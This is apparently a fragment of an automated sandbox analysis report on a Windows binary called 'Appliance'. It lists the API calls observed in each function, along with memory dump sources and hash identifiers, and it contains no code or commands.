                                                                                                                                            • Instruction Fuzzy Hash: FC115A75510619FFDB218FA5EC80EAE77B9EF01760B104499E802E7214EA31AE859B60
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DD3006
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                            • String ID: CALL$bn
                                                                                                                                            • API String ID: 1385522511-1920074456
                                                                                                                                            • Opcode ID: 8c7c816ba08805943febc75768c9a60e55f0a1b223ea64ced74281eeb164ca9f
                                                                                                                                            • Instruction ID: 5a677dd3d3d9a477388366727461e1853b22f7b0ac19842ed258d683e12a7008
                                                                                                                                            • Opcode Fuzzy Hash: 8c7c816ba08805943febc75768c9a60e55f0a1b223ea64ced74281eeb164ca9f
                                                                                                                                            • Instruction Fuzzy Hash: DC227A706083419FC714DF24C880A6ABBF1FF99314F18895EF4969B3A1D771E985CBA2
                                                                                                                                            APIs
                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00E0413B
                                                                                                                                              • Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871
                                                                                                                                              • Part of subcall function 00DC3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DC3A76
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                            • String ID: X$`u
                                                                                                                                            • API String ID: 779396738-2693526198
                                                                                                                                            • Opcode ID: 1048b54d5a5149892700a35f18a117965884524b17760cb8cebd10ab66cd1917
                                                                                                                                            • Instruction ID: f71078fed3d22db2366a719acfcd8d6e5b9f878f8d36b8d27f9eed8b792812a1
                                                                                                                                            • Opcode Fuzzy Hash: 1048b54d5a5149892700a35f18a117965884524b17760cb8cebd10ab66cd1917
                                                                                                                                            • Instruction Fuzzy Hash: 6D219F70A042589BDB01DF94C805BEE7BF8EF49304F00801DE549B7281DBB49A898FB1
                                                                                                                                            APIs
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09D8
                                                                                                                                              • Part of subcall function 00DE3614: RaiseException.KERNEL32(?,?,?,00DE09FA,?,00000000,?,?,?,?,?,?,00DE09FA,00000000,00E89758,00000000), ref: 00DE3674
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09F5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                            • String ID: Unknown exception
                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                            • Opcode ID: 378415238ddc6e7691f09267d95e6d57c7aaac2950259bd93cc1ee28e8a894bb
                                                                                                                                            • Instruction ID: be9d30b0e28724aafb9c345f23f1e3081941dc47fefb255e0b5dd66f31a85ce3
                                                                                                                                            • Opcode Fuzzy Hash: 378415238ddc6e7691f09267d95e6d57c7aaac2950259bd93cc1ee28e8a894bb
                                                                                                                                            • Instruction Fuzzy Hash: 7EF0683490038D77DB00BEB6EC469AE7B6C9E00350B584125B95CE6593FBB1E695CAF0
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E48D52
                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00E48D59
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00E48F3A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                            • Opcode ID: dffb5e4a6ad95a9e36621a1a0a4d4b2b3fac32644a86af888f9e493ada4f2a3d
                                                                                                                                            • Instruction ID: 158111c6b462147ab09eb3dc744a2df82aaa91b94bae2d2f428a25d6621f9c2e
                                                                                                                                            • Opcode Fuzzy Hash: dffb5e4a6ad95a9e36621a1a0a4d4b2b3fac32644a86af888f9e493ada4f2a3d
                                                                                                                                            • Instruction Fuzzy Hash: DE128B71A083019FC724DF28C584B6ABBE5FF84318F14995DE889AB352CB71E945CB92
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                            • Opcode ID: 09528f49577062b9c849d145cdb31dd86d3140d731ec8c61185b786f60b8ff0a
                                                                                                                                            • Instruction ID: 84e92ca84476b2e3f6eebd21d980fd93c352752855d717199cc178e2aeef774d
                                                                                                                                            • Opcode Fuzzy Hash: 09528f49577062b9c849d145cdb31dd86d3140d731ec8c61185b786f60b8ff0a
                                                                                                                                            • Instruction Fuzzy Hash: 8EA13B31604505DFCB18DF18D5D1AAABBA1FF45314B6094ADE84AAF392DB31ED42CB90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DC6299
                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00DDFD36
                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DDFD45
                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E1FE33
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                            • Opcode ID: 0a8c94249644121cc02206ad268ab99ba8272e51c2228c809f1b156023db5c67
                                                                                                                                            • Instruction ID: 7f04bf816a6dfbb8e2cced8b693cd5a9dfb748df14a91d4b8e08aff538237157
                                                                                                                                            • Opcode Fuzzy Hash: 0a8c94249644121cc02206ad268ab99ba8272e51c2228c809f1b156023db5c67
                                                                                                                                            • Instruction Fuzzy Hash: 0A31A971904344AFDB32CF24D855BE7BBEC9B06308F04149ED6DA67242C7745AC5CB51
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00DF97BA,FF8BC369,00000000,00000002,00000000), ref: 00DF9744
                                                                                                                                            • GetLastError.KERNEL32(?,00DF97BA,FF8BC369,00000000,00000002,00000000,?,00DF5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00DE6F41), ref: 00DF974E
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00DF9755
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                            • Opcode ID: 026108c469e8ee7377c2890562787f8482a83374c47e52185374869318af5ed3
                                                                                                                                            • Instruction ID: fb4156fbc80848268bbe6ba5e74b9c1d4b6ed1a74d2da1c6b192f45de1d8e498
                                                                                                                                            • Opcode Fuzzy Hash: 026108c469e8ee7377c2890562787f8482a83374c47e52185374869318af5ed3
                                                                                                                                            • Instruction Fuzzy Hash: 38014032A2461CAFCB15BF9ADC05D7E7719DB85330B394249F91197190EA30DD41CBB0
                                                                                                                                            APIs
                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC3A3C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                            • Opcode ID: dccbcb46bf91a6c2adf3ef7205165cd10ee35cae98d35034a2d59bb637f72205
                                                                                                                                            • Instruction ID: 1a4af53bf18c4f1978356ce1f75859df81d53f72f064a14a7c35b651be7d0012
                                                                                                                                            • Opcode Fuzzy Hash: dccbcb46bf91a6c2adf3ef7205165cd10ee35cae98d35034a2d59bb637f72205
                                                                                                                                            • Instruction Fuzzy Hash: 8631A7B0504302DFD720DF25D885B97BBE8FB48708F00092EF6D9A7281D775A958CB62
                                                                                                                                            APIs
                                                                                                                                            • IsThemeActive.UXTHEME ref: 00DC333D
                                                                                                                                              • Part of subcall function 00DC32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DC32FB
                                                                                                                                              • Part of subcall function 00DC32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DC3312
                                                                                                                                              • Part of subcall function 00DC338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DC3368,?), ref: 00DC33BB
                                                                                                                                              • Part of subcall function 00DC338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DC3368,?), ref: 00DC33CE
                                                                                                                                              • Part of subcall function 00DC338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E92418,00E92400,?,?,?,?,?,?,00DC3368,?), ref: 00DC343A
                                                                                                                                              • Part of subcall function 00DC338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC34BB
                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00DC3377
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                            • Opcode ID: 7172b32279ec4fd5ae89fad7e8570438251dd11825a076804cf4a55a2bd1e64f
                                                                                                                                            • Instruction ID: 7aecc2e3d9ee092206fde082684ee8098858fcfcc2b04b889bb7e4af2eeeb803
                                                                                                                                            • Opcode Fuzzy Hash: 7172b32279ec4fd5ae89fad7e8570438251dd11825a076804cf4a55a2bd1e64f
                                                                                                                                            • Instruction Fuzzy Hash: E8F05B31554386BFDB10BF72FD0AF283794E704759F04491FB708660E2DBB545588B64
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00DCCEEE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                            • Opcode ID: 638e3ea4b17f8bda8f8287cf25e9dc4a60b122222abd90727f899f5a98a655f3
                                                                                                                                            • Instruction ID: 27d18c0eb272d7ddc06146b91e2e8c2aed13395aea8959e9e6274f6f09287f4b
                                                                                                                                            • Opcode Fuzzy Hash: 638e3ea4b17f8bda8f8287cf25e9dc4a60b122222abd90727f899f5a98a655f3
                                                                                                                                            • Instruction Fuzzy Hash: 7032A274A002069FCB10DF54C885FBAB7B6EF45354F19909EEA1AAB351C734ED85CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LoadString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                            • Opcode ID: ea7c776df7b0bda97acf93536f86a0b55543861b784620953c58566606979a15
                                                                                                                                            • Instruction ID: 55efaa637eff33d77644958a50828daa19c866b60e4beca398b12848cc7a3355
                                                                                                                                            • Opcode Fuzzy Hash: ea7c776df7b0bda97acf93536f86a0b55543861b784620953c58566606979a15
                                                                                                                                            • Instruction Fuzzy Hash: 83D16974E0420ADFCB14EF98D881DEDBBB5FF48314F14415AE955AB291DB31AE81CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8befb3da8ead34a00c48c74bb106428411a11d82f4d9c0ebad94a7c9f58ceec9
                                                                                                                                            • Instruction ID: 90815079aa545a6a46f6068c0aab94082a1e120394a7eb793aecfa5c0f838543
                                                                                                                                            • Opcode Fuzzy Hash: 8befb3da8ead34a00c48c74bb106428411a11d82f4d9c0ebad94a7c9f58ceec9
                                                                                                                                            • Instruction Fuzzy Hash: AC51D935E04288AFDB10EF6AC841B697BA1EF85364F19C168E958DB391D731DD42CB70
                                                                                                                                            APIs
                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00E2FCCE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                            • Opcode ID: fb0349a7f00f0b6a9a14a0f568c6c531a442eff753d78dd25ba1e2fdf6d4436f
                                                                                                                                            • Instruction ID: fc57ad61e9d1824ff09773c8b68c9f56eb01d7cb417d069bb3351654d16a0751
                                                                                                                                            • Opcode Fuzzy Hash: fb0349a7f00f0b6a9a14a0f568c6c531a442eff753d78dd25ba1e2fdf6d4436f
                                                                                                                                            • Instruction Fuzzy Hash: 2741D672500209AFDB11EF68D881AEEB7F8EF44314B20453EE516EB251EB70DE45CB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC664A
                                                                                                                                              • Part of subcall function 00DC663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC665C
                                                                                                                                              • Part of subcall function 00DC663E: FreeLibrary.KERNEL32(00000000,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC666E
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC66AB
                                                                                                                                              • Part of subcall function 00DC6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6610
                                                                                                                                              • Part of subcall function 00DC6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC6622
                                                                                                                                              • Part of subcall function 00DC6607: FreeLibrary.KERNEL32(00000000,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6635
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                            • Opcode ID: d77bf2ee4ac0d6ab5e112bbbddf5deb56b22b7ffe43fcb67cf67b008cb2e32b3
                                                                                                                                            • Instruction ID: 905d85d0fd3daf3a40a843fb75f4294d7d3111b1e61603824f0475d8b30c14e0
                                                                                                                                            • Opcode Fuzzy Hash: d77bf2ee4ac0d6ab5e112bbbddf5deb56b22b7ffe43fcb67cf67b008cb2e32b3
                                                                                                                                            • Instruction Fuzzy Hash: 1311E772640206AACF14BB20CC02FADBBA5DF50715F10486DF482A71C2EE75DA45DB70
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                            • Opcode ID: 7ffcbdff74506422743d7e6c53ff256570e7cea019663446e54134057fcafe9d
                                                                                                                                            • Instruction ID: fdf526cfda40983ac310415138ffa9d42b3f6e5eae8a53d5d34fe467f45351cc
                                                                                                                                            • Opcode Fuzzy Hash: 7ffcbdff74506422743d7e6c53ff256570e7cea019663446e54134057fcafe9d
                                                                                                                                            • Instruction Fuzzy Hash: 51115A7190420EAFCF05DF98E941AAE7BF5EF48300F1580A9F908AB311DA31EA11DB65
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DF4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00DF319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00DF5031
                                                                                                                                            • _free.LIBCMT ref: 00DF53DF
                                                                                                                                            Memory Dump Source
